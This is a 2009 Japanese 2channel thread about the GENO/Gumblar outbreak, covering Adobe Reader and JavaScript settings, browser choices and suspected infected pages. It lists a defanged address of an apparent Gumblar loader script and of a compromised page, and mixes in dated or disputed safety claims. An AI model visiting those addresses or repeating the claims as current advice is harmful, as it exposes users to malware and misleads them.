現時点で対応してるウイルス対策ソフトって何々あるの?
Masuzoe
脆弱性の部分をアップデートしておけばGENOタイプは滅多なことじゃ感染しない ウィルス対策ソフトに頼る前にそっちからやっていこうぜ
このウイルスってwindows95、98とかでも感染するの?
どこに巣食うかによる
635 :
名無しさん@お腹いっぱい。 :2009/06/04(木) 13:20:52
>>631 のようにゼロデイアタックを知らずに、脆弱性を塞いでおけば
ウイルス対策なんかいい加減で好みのものを使えばいい、あるいは
なくてもOKと思っているそんな奴に限って知らぬ間にPCを乗っ
取られるんだぜwww
だが脆弱性もチェックしてくれる高検知率のカスペなら安心だな
ほらな[age]だろ
637 :
名無しさん@お腹いっぱい。 :2009/06/04(木) 13:32:33
>>635 釣りのようだ
マジなら支離滅裂な思考について行けないな
民剤でらりってるんだろ
foxitに乗り換えてスクリプトを無効にすればまずPDF関係の感染は解消されると思う。 起動もadobeより速いし、無料版でも広告を消せるし、 マルチリンガルだし、アクチベーションが何とかって喧しく言われないし
んなことはこのスレにいる誰でも知ってる
それを踏まえて定期的に書く事に意味があるのだよ。 そもそもadobe製品にはロクなものが無いから・・・
>>639 OPERAも[pdf]の関連付け外せば自動実行されね-ぞ
表示は速いし
広告は初めからないし
スクリプトもページごとに設定可能だし
flashは使ってるくせに
FLASHは基本外してる。 必要のないところで使う必要もないし。
そうだね、Opera最強伝説だね
いや、最強かどうかは知らんが FireFoxだけ利用者が増えると ターゲットがIEから火狐に移るだけだろ? 色々有るから、設定方法も知って使って欲しいだけ
最新版にしてリーダはスクリプト無効にしときゃ平気
649 :
名無しさん@お腹いっぱい。 :2009/06/04(木) 16:35:28
前からあっただろw 必死ダナーwwwwwwwwww
火狐に関してはnoscript導入が当然のようになっているが RequestPolicyや他のアドオンの組み合わせでもセーフな気がする
しらん
絶対なんていってないだろ 比較的操作設定が容易で利用者が多いから勧められてるだけかと
ブラウザ戦争しろ
突っ込み病患者に優しくしてあげてください
NOSCRIPTは確かにめんどくさい USの方のアドオンサイトに行けば割と掘り出し物があるからお勧めする
スクリプト無効なんてやってられるか 脆弱性の対策しときゃ大丈夫だ
スクリプトなんか切る奴は情弱って言ってる人もいるんだけど 何もわからない本物の情弱ははっきりしないことはとりあえず念入りにしときます
全く安全
多くのウイルスがJavaScriptを介して、pdf、swf等を読み込ませるからJavaScriptが問題だと勘違いされがちですが、
javascript単体にはローカルファイル操作、レジストリ改変等を行う機能は存在しません
よってその対処法を導入していれば持続的な被害に合うことは一切ありません
>>657 ,658
雑魚は黙ってなさい
まぁ、GENO亜種や非ガンブラー系の対策としてJS切っておくのは間違いではないな もう、普通のGENOの時代は終わった っていうか、ただの氷山の一角に過ぎない 本当の地獄はこれから
IDの出ないスレだと強気だな(`・ω・´)
>>659 アフィ管理人きたー!
↓これ直さないの?ねぇねぇ直さないの?
■ adobe readerを9.1.1にアップデートする(9.1:9.1.0では駄目)
665 :
659 :2009/06/04(木) 17:03:20
かんりにんじゃないよ
667 :
名無しさん@お腹いっぱい。 :2009/06/04(木) 17:07:14
ドーデもいいから同人板で語ってくれ
>>655 よそのアドオンもいいですが、たまには、ぬりかべのことも思い出してあげてください。
670 :
629 :2009/06/04(木) 17:30:24
>>631 とりあえず、アップデートはまめにしてるんだけど、ちょっと心配だったから聞いてみたんだ。
レスありがとう
円周率もしらないのか
673 :
672 :2009/06/04(木) 17:45:42
吊ってくる
チェッカーで調べたらamazonが10%で少し危険ってあったけど これは既出なの? それとも10%くらいじゃみんな気にしないのか
99%でも気にしない
>>675 そもそもチェッカーは当てにならないし
てかTOPの書いてあるのちゃんと読もうよ
100%になったらまたきてね
1000%になったらうちに来ていいよ
なんか伸びてると思ったら…なんのこっちゃw
うちのサイト、今までチェッカーで1000%だったんだけどさっき調べたら100%まで落ちてたww
ちぇっかーw
チェッカーはかなり前に100%制に改定されてるだろ どっちにしろ、信用は出来んが
君は1000%〜♪
>>642 勘違いしてるようだがfoxitはPDFリーダでWebブラウザじゃないぞ。
>>659 javascript単体でどうこうするウィルスは確かにほとんど居ないが、脆弱性自体はあるし、あった。
ウィルスではないが、XSSなどはjavascript経由で発症する物がほとんどであるし、切る事で安全性は確実に高まります。
「自分の持つシステムのパスワードを全部統一していてもどれかが洩れない限りは安全ですが洩れたときのことを考えてばらつかせる方が安全です」
ってのと同じで、被害を広げない意味での対策としては非常に重要です。
セキュリティのセの字も知らない雑魚は黙ってなさい
>>686 JavaScriptの話は別として
そいつの話で問題なのはJavaを無効にすれば問題なしって話だろ
全く的外れに思えるが良いのかそれで?
>>688 いいえ良くありません
JavaScriptとJavaはまったく別のものです
じゃあなんでサイトの間違い直さないんだ 今は良いとしてGENOが復活したらまずいだろ
ふざけてねえ出直せよ
もう封鎖したよ。潜在的な感染者はかなりいるだろうからまた新たに増やす意味も無い。 作った奴の予想以上に馬鹿が多かったって事だ
なにを封鎖した? 迷惑サイト? ならまだあるよな GENOに限らないことだから間違ったままにしとくなよ
偶然かもしれんがアフィのアマゾンリンク?クリックしたらリンク先でブラウザがクラッシュした 詳しい人調べてみて
アンチが一気に沸いてきた というより アンチ:恐らく一名の活動時間になった 今週は忙しかったの?
アンチとみせかけてクリックさせようとしてるんだろw
ほらな?改行だろ
同人テンプレにチェッカー追加するぐらい暇なんですね^^
>>690 やぁチンピラくん。今日は改行しないのかい?サイトを直さない理由は、直す必要が無いからだろ。
ユーザ側でパッチを当てるなりして対策すれば解決できるものなら直す必要は無い。
アフィは外せないけど運営鯖無料で貸せよ
また句読点の人きたよー
100%で安全なんだか危険なんだか統一したら
雑魚は黙ってなさい
[ad] [ad] [ad] >>>(オススメ度)>>>> [ad]
>>704 100%を求めるなら世のソフトは全て危険
前科があるかないかで言ったばあい、JavaもJavaScriptもFlashもAdobeReaderもFoxitもOperaもFirefoxもIEもShockwaveもHTMLもMIMEも危険
危険性の高いミスの発見頻度で言えば、IEやFlashやAdobeReaderはまだまだ危険がいっぱい
1000%が出た場合確実に感染しています。(05/29 02:425現在) 100%程度が出ても現状ではたぶん大丈夫です。(05/29 02:42現在) ↑の記述のことね
>当方確認のGENOウイルスのみに関して05/30 07:47現在では100%(値を修正しました。)以外安全です。 どっちだよ
雑魚は黙ってなさい
そのコピペフレーズ見るたび、
>>406 で言われたのが、よっぽど悔しかった
んだろうなって透けてみえるから、使うのやめたほうがいいと思うよ。
マジレスするとお前以外このスレ全部俺の自演なんだ ごめんな(´・ω・`)
見当外れなこと言われて悔しいわけないと思うが 単に馬鹿にしてるんじゃね そんなこと理解できないとはおまえ本人か
本人じゃなかったら新手の雑魚だろう そんなことより早く直せよ
こっちが静かだった間、セキュ板ですっごく伸びてたスレがあるんだけど こっちが荒れだした途端、ピタッとレスが止まったよ。 これって、偶然かな?
うん 偶然だよ
よかった。安心した。 帰るところ無くなると、困っちゃうもんね。
ぶっちゃけ複雑なJAVAスクリプト使ってるところはチェッカーに反応する って前にも何度も何度も説明してたな
役に立たない上にアフィリエイト付きかよ
チェッカーから有意な結果を得るより 素人が自分でソース調べられるようになるほうが早いなw
adobe readerはインストールしなくても問題ないんですか?
それは、貴方次第です
PDFファイルを使うことが無ければ必要ないんですよね。 adobe readerがインストールされていなければ問題は無いんですか。 ネットくらいしかしていないパソコンでもPDFファイルは使ってるものなんですか。
ここでぱそこんのつかいかたを聞くなよ、よそでやれ
すみません
なんていうか、初心者互助キャンペーンは終了しましたよっていう流れですな
もう次スレいらナイツ
>>734 「ぱんつのかいかた」に見えた俺は疲れてるのかも試練
相当疲れてるな
なんかPCがおかしいと思って調べたら これぽっいorz いったい、いつ感染したんだよ やっぱり再インストールしか方法ないのか?
はい
いいへ
yes
ぱんつのかいかた
↑疲れてないよそのままだよ
>>728
そこは ぱんつのかいかた で文章でも作るところだろ センスねえな
なるほど
>>734-735 一晩ぐっすり寝たらテンション上がってきた
しまむらでぱんつ買ってくる!
本スレの832だけど、GENOを語るスレ(パソコン一般板) で全部押すとavastでトロイの木馬とか出るんだが AVGとかノートンだと、どう?
>>738 「全部押すと」の意味が分からんが、どうせコードが書き込まれただけだろ
いちいち気にせずにROMれ
>>739 スマン、Avastスレ行って問題ないと
わかった
「全部」押すと じゃね?
ああ、IEか 通りで
2ちゃんねる専用ブラウザーで閲覧しているとは限らないから……
744 :
740 :2009/06/06(土) 12:23:28
使ってるブラウザはFirefoxなんだけど パソコン一般板で、GENOのスレ31・32 両方で「全部」押すと警告出たからカキコした ちなみにIE8でも、やっぱり警告出た 誤検出だと思うが…
>>735 かけそばでっせ で縦読みしてしまったorz...
直ったかも
>>32 とaux2のファイルを上書きしたら
コマンドプロンプトとレジストリエディタ復活した
>>744 IEでもFirefoxでも非専ブラという意味では同じです
スクリプトの功罪やな。
750 :
740 :2009/06/06(土) 14:39:32
751 :
730 :2009/06/06(土) 15:17:31
軽くなったし、とりあえずこれで 様子を見ることにしよう
よかったね
10%も踏まないほうがいいの?
踏んでもおk
降水確率じゃないんだからw
ソース見ればいい話
アクセシしないとソースってみれないよね?
ミス アクセス
>>756 >降水確率じゃないんだからw
降水確率ワロタw
アクセシw
何も面白くない
ああソースみれるサイト見つけた なんて書いてあったらヤバイんだ?
宣伝市ね糞
宣伝違うし お前らどこでソース見てるの?
771 :
名無しさん@お腹いっぱい。 :2009/06/07(日) 01:53:14
私の場合は、いろいろなところの市販品を使ってきた後、今はAntiVirのフリー版に落ち着いています。 検知率はもとより、スキャンスピード、対ウイルス反応、軽さ、誤検知率の低さ、など勘案するとアンチウイルスソフトではAntiVirが最も優秀だと思います。 しかし、このソフトは日本語表示がない上、いろいろ設定が細かいということもあり、どうも一般の人たちには敷居が高いみたいです(事実avast!やAVG、キングソフトなど、他のフリーソフトに比べると使用率は低いと思います)。 他の某専門サイトなどでも、「このソフトはある程度スキルのある人しか使わない」などとコメントされていたりします。 もし、これが日本語対応になれば、その性能の良さと相まって利用者数は相当増加すると思うのですが・・・(確かに、周りでこのソフトを使っている人をみると、パソコン上級者といわれるような人たちの利用率が高いように思います)。 Aviraのフリー版についてですが、個人的にはデフォルトよりも自分で設定したほうが良いと思います。 何といっても、ウイルス発見時のあの音(?)はびっくりするので個人的にはこれはオフのほうが良いと思います。 ルートキット検索機能も確かデフォルトではオフなので、設定でオンにしていたほうが良いのではないでしょうか。 あと、ウイルスの処理も、設定であらかじめ指定した手順で処理させることもできるので、スキャンの終了までパソコンの前に居れず、手動で処理できない人はそちらに設定し直しても良いと思います。 フリー版のメールスキャンについては、一応メールを開くときに実行するそうです(ただし、これをメールスキャン機能と呼ぶかどうかは別問題ですが)。 あと、Aviraのヒューリスティック機能は最優秀らしいですが 設定は「中」で必要十分だと思います(デフォルトは「中」なので変える必要はないですが
>>766 のブログなんかよく分からないけど。汚ねぇHTMLだな。
ソースチェッカーとか付ける前に自分のソース直せよw
ソースチェッカーオンラインは有名だと思うんだけど
だからPDF怖いって
File 0220.pdf received on 2009.06.06 17:28:43 (UTC) Current status: finished Result: 0/40 (0%)
44 名前:名前欄にスレ名入力推奨@自治スレ[sage] 投稿日:2009/06/07(日) 03:34:25 ID:g5tEWN8V0
>>42 File 0220.pdf received on 2009.06.06 17:28:43 (UTC)
Current status: finished
Result: 0/40 (0%)
47 名前:GENO[sage] 投稿日:2009/06/07(日) 03:55:50 ID:hoaxuigN0
流行中で自己書き換え型のマルウエアが
対策ソフト引っかからないなんてよくある話
どんだけおめでたい頭なんだよ
48 名前:GENO[sage] 投稿日:2009/06/07(日) 04:00:06 ID:M8NZAXqJ0
>>47 で、
飛び先は?IPAの注意喚起がマルウェアって証拠は?その根拠は?
49 名前:名前欄にスレ名入力推奨@自治スレ[sage] 投稿日:2009/06/07(日) 04:04:29 ID:2Yomg2r10
なぜ自分で確かめない
779 :
775 :2009/06/07(日) 04:51:46
え、ネタで言ったらマジだったのか。 よく見るとムダにアップローダとか胡散臭すぎるな・・・ 踏まなくてよかったぁ
そういう釣りはいいから 3つともヘッダから何まで普通のPDFファイル
781 :
名無しさん@お腹いっぱい。 :2009/06/07(日) 11:57:37
key?
俺ももらった IPなんかころころ変わるから気休め程度にしかならないだろうが それでも何もやらないよりかは精神的にマシ
てst
今もGENOってやばいん?
三菱自動車の「アイ・ミーブ」のページで仕様をPDFで閲覧したところ FireFoxの動作がおかしくなったのでavastでスキャンしたら 「JS:Redirector-H [Trj]が発見されました」 とアバストたんが言ってるんですが。 @cmd.exeは実行可能 Aamd64_microsoft-windows-m..ents-mdac.resources_31bf3856ad364e35_6.1.7100.0_ja-jp_cda73122ed3dbaea_sqlsodbc.chm_92fe0a89 サイズは、101,136 ディスク上のサイズは、102,400 バイト ja-jp_cda73122ed3dbaeaの部分が違うものが23個検索でヒット OSはWindows 7 RC ヴィルド7100(64bit) UACは ユーザがWindows設定を変更する場合は通知しない(上から1個下) ルータ有り・PFWはWindows標準もの・セキュリティソフトはavast4.8HOME AdobeReader9.1.1 AdobeFlash10.0.22.87 Java(TM)6 Update13 6.0.130 症状としては、ハイパーリンクをクリックしてもライブラリが表示されるだけで リンク先が表示されない Windowsのスタートメニュをクリックしても何も表示されない PCを再起動するとこれらの症状は直るが、HDDがカリカリ言ってる
>>788 開いてみたけど問題ないよ。
ダウンロードページのjsでunescape使ってるから、誤検知したんじゃね?
> 症状としては、ハイパーリンクをクリックしてもライブラリが表示されるだけで
> リンク先が表示されない
この意味がわからない。
javaで小窓が開いてるのに気付いてないとか ポップアップブロックで殺されてるとかじゃないかな?
>>789 よかったぁ
tp://ev-life.com/index.html
ここのChangeTheDriveを見てて、上にあるメニュのトラクションコントロールをクリック
してもリンク先が表示されなかったので不審に思ってスキャンしてみたわけです
そうしたら上のような結果に。今もスキャン中です。
その直前にPDFでスペックを見ていたのでそれが原因かと思ったのですが
よく考えたら、GENOとPDF閲覧って関係なかったかも
誤検出だったのかなぁ
もう一度同じHPの項目クリックしてもちゃんと表示されるしなんだったんだろうか
リンク先が表示されずにライブラリ云々というのは、Windows7での新ライブラリの窓が
何故かHP上のテキストをクリックすると表示されるようになったのですよ
どのテキストリンクをクリックしても何故かライブラリが表示されるように。
やれれたと思ったのですが、誤検出でしたか。
とりあえず安心しました。
ありがとう
cmdじゃなくてsqlsodbc.chmのほうを起動してみればいいのに
しばらく来てなかったからわかんないんだけど、 なんでwikiのほうのまとめサイトをテンプレにいれないの? アフィでも張ってあるの?それとも別の理由?
既出か知らんがラジオフライヤーでググって一番上のが感染してるっぽい
通常のGENOなら感染していても機能はしないから二次被害の心配はないはず
>>797 でも、感染放置してるってことはftpパスを抜かれたままの状態だから、
htmlを再書き換え可能な状態なわけで、安心はできないよな。
じゃあ今のうちにFTPソフトそのものを 削除したら良いんじゃね 更新はファイルマネージャで行うか ブログに移行
いまどきトロイの木馬なんて古過ぎる三角木馬にしておけ
こんなユーモアも糞も無い最低なレス久しぶりに見た
お前もしかして王子か?
木馬王子か 最悪過ぎるネーミングだ……
木場王子かワラww^^
>>803 おまえはGENOスレだけにゲロ王子だな。
王子乙
最近落ち着いてきたな 対策分かればもう大丈夫か 始めに感染しちゃった人はご愁傷
もう解決してない? 普通に飛べたんだけど…
>>811 何をさっきからひとりで騒いでるんだよ?
どれもまったく問題なく開けるぞ。
Googleの検索ワードは何?
>>808 のメッセージはお前のPCがウィルス感染の疑いありで、変なクエリーも
お前のPCから送信されているように読めるんだが。
そんなもの検索してどうなるんだ
>>815 そのページにウィルスかスパイウェアでも仕込まれている可能性でも考えたんじゃね?
818 :
名無しさん@お腹いっぱい。 :2009/06/10(水) 04:45:28
■ おすすめ2ちゃんねる 開発中。。。 by FOX ★ このスレを見ている人はこんなスレも見ています。(ver 0.20) GENOウイルススレ 感染4台目 [インターネット] 【ウイルス】GENOを語るスレ31【完治】 [パソコン一般] 【報告専用】同人サイト向け・GENOウィルス注意11 [同人] 乙女&BL@【公式感染】GENOウイルス注意喚起スレ2 [女向ゲー一般] 【ウイルス被害】GENOを語るスレ32【謝罪なし】 [パソコン一般]
819 :
名無しさん@お腹いっぱい。 :2009/06/10(水) 09:28:39
なんかもう割とどうでもいい
readerとは縁を切ったから俺もどうでもいいな そんな事よりflashの方をupdateしろと
>>819 これ入れたらもうJavaScriptは有効にしていいん?
JavaScriptは基本的にOFF
acrobat readerでjs使わないでしょ普通
825 :
名無しさん@お腹いっぱい。 :2009/06/10(水) 18:14:01
アドビッチのアプデは低速回線には辛いんだけど。
低速回線のやつが蔑称使うなよ情けない
acrobat readerなんてゴミアプリはそもそも不要
社内、支社中をAdobeのアップデートしたばかりなのに またかょ・・orz
でもレジストリには未だにAcrobat Readerで登録されてるんだよね・・・ Adobe側もちゃんと統一しろよ、と。
rel="nofollow"
genoでググると公式サイト以外全部ウィルス関連 もう名前変えるしかないだろこの店
※既に一回変えてます
>>834 genoをgenoxなどに名前変えると、
genoウィルスもそれにあわせて名前かえるべきだろか、genoxウィルス
桃の缶詰を買おうと思いまふ>Geno 閲覧しちゃったけど、平気?
自己責任で・・
842 :
名無しさん@お腹いっぱい。 :2009/06/13(土) 00:15:45
無事感染してることを確認したんですが横に sqlsodbc.chmxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx とかいうファイルがあって吹いた
おまえ頭大丈夫か?
844 :
名無しさん@お腹いっぱい。 :2009/06/13(土) 10:23:19
■ おすすめ2ちゃんねる 開発中。。。 by FOX ★ このスレを見ている人はこんなスレも見ています。(ver 0.20) GENOウイルススレ 感染4台目 [インターネット] 【報告専用】同人サイト向け・GENOウィルス注意11 [同人] 【ウイルス】GENOを語るスレ31【完治】 [パソコン一般] 【ウイルス被害】GENOを語るスレ32【謝罪なし】 [パソコン一般] 乙女&BL@【公式感染】GENOウイルス注意喚起スレ2 [女向ゲー一般]
>乙女&BL@【公式感染】GENOウイルス注意喚起スレ2 [女向ゲー一般]
男A「僕のPCが、GENOに感染しちゃったんだ・・・」 男B「何だって!?それは大変だ!よし、ちょっと見てやるから今すぐお前の家に行くぞ」
>>845 それはいいけど、なぜあっちのスレのおすすめ2チャンネルにあの胸糞悪いスレの名が?
まあ騒ぎを沈静化しようと警笛ならしてた人もいるから、そっち側の人ならいいんだけど
>>846 それネタとして成立してるのか微妙だな
暫く来てなかったんだが同人が騒いで18スレも伸びたのか?
大体あってる
(゚听)イラネ
>>851 汎用リダイレクタは、接続先ドメインで安全確認する際に、リダイレクタ設置サイトで偽装できるって脆弱性
要る要らないじゃなくて、危険物
とはいってもそれを気にする奴に今更GENOを信用する奴はいないわけだが
googleも昔置いてたが、途中からクッションページで止まるように改善(リファラ隠しに使ってた人には改悪)された
I'm Feeling Luckyで飛ぶけどな!
&btnI 使ってブラクラかなんか踏ませるイタズラが瞬間風速的に大人気になった結果… …&btnI のトップが勇気スレになったことがあるw
>>852 そんな情報いまさら(゚听)イラネ
って意味だとは思わないのか
教えてちゃんきめえ
ここでaviraが反応したんだけど、皆反応する? ://www.e87.com/selection/sp_father/ (安全のためにhttp抜きました)
>>855 hxxp://s.nakanohito.jp/bc/bivalves.js
これかな
>>856 そうです、それです。ウイルス名を検索かけてもaviraのデーターベースにないので
もしかしたらGENOウイルスがまた改変して戻ってきたのかな、と
確かにそれっぽい物が埋め込まれてるな
>>859 でた
Trojan-Downloader.JS.Gumblar.a
863 :
859 :2009/06/16(火) 22:35:28
>>862 お疲れ様です!
検索でも上の方に出て季節的にも踏む人がいるかもしれないから
ちょっと心配しながらも、ドメインへの接続ができなければ大丈夫かな?と
放置してしまってました。対応ありがとうございました。
意外なジャンルへも広まってますね・・・
呪いのビデオの様に広まって行ってたみたいだから ジャンルはあまり関係無いかと思われる
865 :
名無しさん@お腹いっぱい。 :2009/06/17(水) 14:16:11
めんどくせーけどチョロメに変えようかな
最近サイト改ざん多いなぁ
868 :
名無しさん@お腹いっぱい。 :2009/06/17(水) 16:23:15
GENOより強力な新型が出現したみたいだけど
これって、Acrobat Reader のJavaScript実行をOFFにしていても防げないの?
↓ ↓ ↓ ↓ ↓ ↓ ↓ ↓ ↓ ↓ ↓ ↓ ↓
〓PDFの脆弱性をつくアダルトサイトに要注意--G Data Softwareが警告〓
http://japan.cnet.com/news/sec/story/0,2000056024,20395086,00.htm <抜粋>これらのサイトはインラインフレームを含んでいるため、PDFファイルを埋め込むことが可能になっている。
実際にPDFが表示されるわけではないが、 PDFの脆弱性を利用してユーザーにマルウェアを送り込むことから、
通常は「PDFウイルス」と呼ばれている。リンクされているPDF文書は中国にあるサーバに置いてあり、ユーザーが
アダルトサイトのページを開いた瞬間に、AcrobatのプラグインがそのサーバーらPDFを読み込もうとして、実際には
ウイルスをロードしてしまう。
>>21 確実に治ってないな、それ
AcrobatReaderをどうにか消せないか?
実行部分だけでも起動しないように出来ればそれ以上被害は出ない
ただ感染したままだけど
>>868 表示されないってのは表示領域が0なだけだとおもう
その文章だけじゃわかんないけど既存の脆弱性なら
最新バージョンの使用およびReaderのJavaScriptオフで大丈夫じゃないかな
つーかエロサイトはそれ以外もいろいろあるから心配なら控えましょう
控えるのが無理なら対策を勉強するかPCを投げ捨てれば大丈夫です
>>870 >>27
>>866 いづれWindowsXP+クロームあたりも狙われるかもしれないから、
念のためにWindows7+クロームのユーザーエージェントを入れて使えよ
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5
これで貧弱なXPがWin7へと見た目だけ偽装できるw
もうAdobeアンインストールしようかな 他になんか軽くて良いのがあったよね
もうPDFとフラッシュは見れ無くてもいいよ
まだfoxit readerに乗り換えてない情弱がいるのか
乗り換えた先のアプリに脆弱性が存在したら結局意味ないんだよな せいぜい普及率の低さ逆手に取るくらいしかメリットがない
878 :
名無しさん@お腹いっぱい。 :2009/06/17(水) 17:22:55
いちいち「情弱」って語に反応するなよ コンプ丸出し
それ位でムキになんなよ
確かにw
なんだ図星か
別にfoxit readerがスタンダードじゃねーし 得体の知れないウィルスごときで皆で一斉に乗り換えるのも馬鹿らしいわな
>得たいの知れないウィルスごときで
何故コピペしなかった?
888!
技術不足かよw
コンプティーク丸出しの意味がわからない
ばかばっか
なんだ図星か
無限ループって怖くね?
えっ
きも
さっきから情弱が必死になってるな
情弱ってそんなに悪いことなのか?
火狐とIEではしくみが違っているんだよな 一応、Adobeリーダーがpdfを自動で読み込まないように火狐とIEの設定を変えてみた
ジェノウイルスはマジやばい
>>876 genoウイルスでfoxit readerに乗り換えた時には修正されてたのか
今後Adobeリーダーのどのような脆弱性を狙ってくるか解らないから自動読み込みは禁止だな
PDF 閲覧ソフトいろいろ試したけど Adobe Reader 以外だと表示が崩れることがあるから 基本的に Adobe Reader かなー いったん起動してしまえば軽いし
めったにつかわないんだから、Readerのプラグインだけやめればいい 問題はゼロにならないが、だいぶちがうとおもわれ 次スレもこのスレタイでいくん?
スクリプト全般を動作できないようにすれば解決するのにな
910 :
名無しさん@お腹いっぱい。 :2009/06/18(木) 00:05:02
>>847 ネタとして成立させるならこうだな
男A「僕のアナルが、GENOに感染しちゃったんだ・・・」
男B「何だって!?うほっ!それは大変だ!よし、ちょっと見てやるから今すぐお前の家に行くぞ」
>>869 >つまり,システムがデータを暗号化する前に情報を詐取しているということだ。
>このためSFTP(セキュア FTP)を利用していても,安全というわけではない。
これは嘘か誤解か情報不足だな。
キーロガーのトリガとして使うって意味に取れるが、SFTPクライアントにパスワード記憶させてるケースなら、パスを抜けない。
記憶させなくとも、接続前にパスワードを先行入力した場合も抜けるかは怪しいな。
周辺を辞書化してアタックするのかね?
912 :
名無しさん@お腹いっぱい。 :2009/06/18(木) 00:28:48
9.1入れたらpdf見れなくなったから8に戻したよ まじうぜーよ糞だなアドビ
レンタル鯖のファイルマネージャなら大丈夫という話を 聞きましたが、本当でしょうか?
皿うどん食いてぇ
食いもんがネットで落ちてくるようになんねーかな
今開発してるからもうちょっと待ってて
ラーメンでけた
これって情弱とか言ってる自称情強が結構感染してんだよな
情弱って、板やスレの平均知識より低いとか煽りたい相手が自分より知識が劣ってる点を卑下する2ちゃん用語で しかも特定の板でしか用いられないもんだから、進んで多用したがるような動機のある奴は 実際情報弱者の類に入るケースが多いんだよな
マルチうぜえよ
XP IE8でも設定次第でGENOウイルスやナインボールは防げるよね
>>924 情弱は他のブラウザやPDFリーダーなどに逃げる傾向にあるな
そして乗りかえた先の脆弱に陥るのが情弱でもあるがw
ぜいじゃくじょうじゃくきじゃくせいー
927 :
名無しさん@お腹いっぱい。 :2009/06/18(木) 16:58:27
政府にせよ自治体にせよ交通各社にせよ、何でもかんでもpdfファイルにしてくれるもんだから、困る。 GENOウイルス云々以前に、重いんだが…ここまでpdfばっかなのは何でだ。
>>927 それは閲覧する環境を整えるのに無駄な経費と無駄なライセンス料を払う必要が無いからだろ
なによりOSに依存しない電子ドキュメントを選ぶならPDFが一番扱いやすいわけだし今更選択肢など他には無い
契約書、拝見しました。ような気がします。昨日寝ながら。みたいな
>>928 ああ、そうか…やっぱりそういう事情か…。
教えてくれて、ありがとう。
余計な拡張機能をつけないでPSファイルをもっと推進してくれれば良かったのに。 余計な機能を追加し続けるから、ある程度新しいリーダを入れ続ける羽目になるし、 ある程度新しいと余計な機能ゆえに脆弱性も多くて神経質なアップデートを強要されるし、 神経質にアップデートしてもゼロデイ攻撃がゴロゴロ起きる上に対策がスクリプト機能を手動で殺してください、じゃどうにもならん。 昔からあるPNGとかJPGとかRIFFを見習って、コア機能と拡張機能は分離してパース出来るようにしろっての
今更そんな事いってどうするよ。PDFのフォーマットが確率するまえにいっとけよ。
今後も余計な機能を追加し続けるに1ペリカ
冷蔵庫がつくのはいつになるかなwktk
そのうちASIMOがPDFを読み上げるんだろ
何か完全に収束したって感じね
ジスレいらんよ
MS 謹製の XPS の普及に期待 現状ではファイルサイズもビューアの重さも表示や印刷の品質もクソだけどw
>>924 IE8は未対応のページが多いとい言う致命的な問題があるから論外
くだらん
>>938 とりあえず、次俺らどこに移動するん? だいたい落ち着いてるし、手堅くセキュ板?
ってあれっ、ここがセキュ板か インターネッツ板かと インターネッツ板のスレが、比較的ふいんきが近い 残り60%くらい あるいは、zlkonウイルス擦れ ってのがこの板にあって、これが残り95%
作った人ってもう捕まった?
946 :
名無しさん@お腹いっぱい。 :2009/06/19(金) 11:04:26
>>946 童貞を卒業出来なくなる魔法をかけました。
イタズラで晒されたんだろうね、ウイルスのかわりに、SPAMがわんさか来るよ お気の毒に
他人のメールアドレスを晒してるんじゃね
adobeに限らずPDF Readerのjavascript関連には脆弱性がたっぷり含まれていたわ adobeはブラウザから無効にならなかったり、他のPDFはJSをOFFにしても無効にならない場面があったりする セキュリティを固めたつもりがフヌケだったという、これらも脆弱性のひとつだろうな
またか。MS謹製の対策ソフトは弊害が多いからスカン。前に出たのはOEを壊されたりしたしな
そんなことよりOSとかオフィスとか安くしろよ
お断りします。
>>954 個人が買うもんじゃないから。特にオフィス。
OSも定価では買わないw OS付きの中古かな
お前がどこで買おうとどうでも良いよ そんな話誰もしてないし興味ない
また嘘クソ垂れ流しのテンプレで立てたな よくやるわ
GENOはもう良いだろ
もういりまへんわ
わてほんまによういわんわ
,r‐―‐-、 / \ / ,ィ ヽ i' _.j_,j,rj_j,:、_ 、 l iト、._j'ji !! ァ-、 !j !;l! トヽ, ( .`t.!!/ _!.ヽ='イi ,' ) / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ヽヽ,j ,--、 j r ィ~\ | まだだっ!まだ終わらんよ! )ヽヽ. ゙=' /l )ーi l <. ゙t j `ー‐' 」 iト-'~i !. \____________ l フ┬┬i'~二'iノ二ソノ. liブ ,i i !└┘!__//_ _,.:ヴー、j__j__jr-‐‐'''ー----`エー、_ _/ / i' i' i' / \ ヽ / ト-'" ,i' i' i' / ヽ. ) i' l! ! ! ! j ,il ,.r'~ヽ ,ト、 l ! ! ,! / i / i ノ ! ヽ,! ! ! ゙i ,i レ' ヽ ヽ ( j '! ! ! ! j ,「 ,.:='',T゙イ エー-i、 j ,! i! l /∧,/ ヽ. ! .i! \ ! ! ! ! ,i i ヽ \! .i k' ! ! i. j j i' ! ヽ. ! ,ネ、 j 十==)j ,ノ ! j \ ) ノj __, ,八 く__」_,.='子‐-ァ、」 // ゙v'__! // ,! ] ̄く く ̄ ̄~「「>'^Y / ____) _凡、_ _ノ j_,.-‐'t‐‐'ナーt‐‐「j l レ'" i l/~`ーニニj / ,!ー十'"`T"~~^TT゙i l l
JSオフ、iframe,フラッシュオフ、アドビリーダーアンインスコで不便でしゃーないわ
>>963 JavaVMは消したかい?
あとまぁ、只のHTMLでも解釈ミスでやられるって例もあったし、JPGのデコードエラーで感染するってのもあったよな。
・・・1CD Linuxとか、CDブートWindowsとか、VMとか、ブラウジングはそういう環境でのみ実行するって決め打ちするほうが案外楽かもな
>>859 もう無害化されてんの?
何も出ないんだけど。
CDブン回してネット見るとかもうね 単に書き込み禁止にしてれば良いだろ
テキストブラウザでいいよ
968 :
名無しさん@お腹いっぱい。 :2009/06/20(土) 13:18:36
>>966 無知な俺にHDDを書込み禁止にする方法を教えてくれ
>>970 HDDを容量限界まで食い尽くせ。物理的に書き込みしたくても出来なくなる。
>>970 アクセス権かな?
ファイルシステムによるんだろうけど
>>970 nomore.comを実行。その後は書込めなくなる。
なにかを削除しちまえば書込めるのが嫌だっていうなら、物理的に引っこ抜け。
>>971-973 皮肉で言ってるんだけどな・・・
ファイルサイズを食い尽くそうがファイルシステム側でロックしようが、ウィルス・マルウェアが攻撃目的で削除・変更するのを防げるわけではないだろ。
引っこ抜いたら読み込みも出来ねぇよ。
せめてReturnilを挙げる位してくれ。
過剰反応
>>974 悪意のある文章だw
罠にはめようと(ry
この数行のレスを生半可な知識で行うと大変な目にあう
